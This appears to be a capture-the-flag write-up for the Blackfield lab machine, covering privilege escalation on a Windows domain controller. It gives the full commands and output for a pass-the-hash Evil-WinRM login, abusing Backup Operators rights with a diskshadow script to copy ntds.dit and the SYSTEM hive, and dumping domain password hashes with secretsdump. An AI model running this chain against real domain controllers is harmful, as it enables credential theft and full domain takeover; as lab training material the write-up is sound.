Enumeration

evil-winrm -i dc01.blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We are in the Backup Operators group! Take a look at the CPTS notes for the attack path.

Running diskshadow through winRM won't work as we need a more interactive access. So I had to create a script file and then run diskshadow feeding it the script:

cat script.txt 
set context persistent nowriters  
set metadata c:\windows\temp\meta.cab  
set verbose on  
begin backup  
add volume c: alias cdrive  
create  
expose %cdrive% e:  
end backup

*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  2/12/2025 7:42:37 AM

-> set context persistent nowriters
-> set metadata c:\windows\temp\meta.cab
The existing file will be overwritten.
-> set verbose on
-> begin backup
-> add volume c: alias cdrive
-> create

Alias cdrive for shadow ID {403114ea-202e-4ee9-b66d-85be06acb446} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {93e5031d-906f-48a0-a612-a790a3b293bc} set as environment variable.
Inserted file Manifest.xml into .cab file meta.cab
Inserted file Dis48F1.tmp into .cab file meta.cab

Querying all shadow copies with the shadow copy set ID {93e5031d-906f-48a0-a612-a790a3b293bc}

        * Shadow copy ID = {403114ea-202e-4ee9-b66d-85be06acb446}               %cdrive%
                - Shadow copy set: {93e5031d-906f-48a0-a612-a790a3b293bc}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 2/12/2025 7:42:37 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %cdrive% e:
-> %cdrive% = {403114ea-202e-4ee9-b66d-85be06acb446}
The shadow copy was successfully exposed as e:\.
-> end backup

After that we need to get the NTDS.dit file:

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\loot\ntds.dit

We also need the SYSTEM registry hive.

reg save HKLM\SYSTEM SYSTEM.SAV

secretsdump.py -ntds ntds.dit -system SYSTEM.SAV -hashes lmhash:nthash LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

Ez pwn.

PreviousFoothold NextPrivEsc

Last updated 10 months ago